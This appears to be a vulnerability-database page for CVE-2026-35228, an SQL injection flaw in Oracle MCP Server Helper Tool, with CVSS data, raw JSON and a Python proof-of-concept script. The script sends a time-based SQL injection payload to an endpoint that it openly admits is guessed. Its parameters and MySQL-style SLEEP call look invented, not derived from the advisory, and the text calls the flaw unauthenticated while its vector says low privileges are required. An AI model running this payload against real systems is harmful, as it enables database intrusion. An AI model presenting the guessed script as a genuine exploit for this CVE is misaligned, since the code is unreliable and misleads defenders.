Security Vulnerability Report
CVE-2026-35228 CVSS 8.7 HIGH

Published: 2026-05-05 04:16:17
Last Modified: 2026-05-05 19:47:31

Description

Vulnerability in the Oracle MCP Server Helper Tool product of Oracle Open Source Projects (component: helper tool). The supported versions that are affected are 1.0.1-1.0.156. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle MCP Server Helper Tool. Successful attacks of this vulnerability can result in Oracle MCP Server Helper Tool executing malicious SQL.

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Oracle MCP Server Helper Tool 1.0.1
Oracle MCP Server Helper Tool 1.0.156

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-35228
# SQL Injection in Oracle MCP Server Helper Tool
import requests


def exploit_sql_injection(target_url):
    """
    Attempt to exploit SQL injection vulnerability.
    """
    # Example endpoint based on common MCP structures, adjust as needed
    endpoint = f"{target_url}/api/helper/query"

    # Malicious payload to test SQL injection
    # This payload attempts to cause a time-based delay or logical true condition
    payload = "1' UNION SELECT SLEEP(5)-- "

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/json"
    }

    try:
        # Sending GET request with vulnerable parameter
        params = {
            "id": payload,
            "action": "execute"
        }
        print(f"[+] Sending payload to {endpoint}")
        response = requests.get(endpoint, params=params, headers=headers, timeout=10)

        if response.elapsed.total_seconds() >= 5:
            print("[!] Potential SQL Injection detected (Time-based delay observed).")
        elif "syntax error" in response.text.lower() or "sql" in response.text.lower():
            print("[!] Potential SQL Injection detected (Error message observed).")
        else:
            print("[*] Request sent, analyze response manually.")

        print("[*] Response Status:", response.status_code)

    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")


if __name__ == "__main__":
    target = "http://127.0.0.1:8080"  # Replace with actual target
    exploit_sql_injection(target)

References

https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35228", "sourceIdentifier": "[email protected]", "published": "2026-05-05T04:16:16.530", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle MCP Server Helper Tool product of Oracle Open Source Projects (component: helper tool). The supported versions that is affected is 1.0.1-1.0.156. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle MCP Server Helper Tool. Successful attacks of this vulnerability can result in Oracle MCP Server Helper Tool executing malicious SQL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html", "source": "[email protected]"}]}}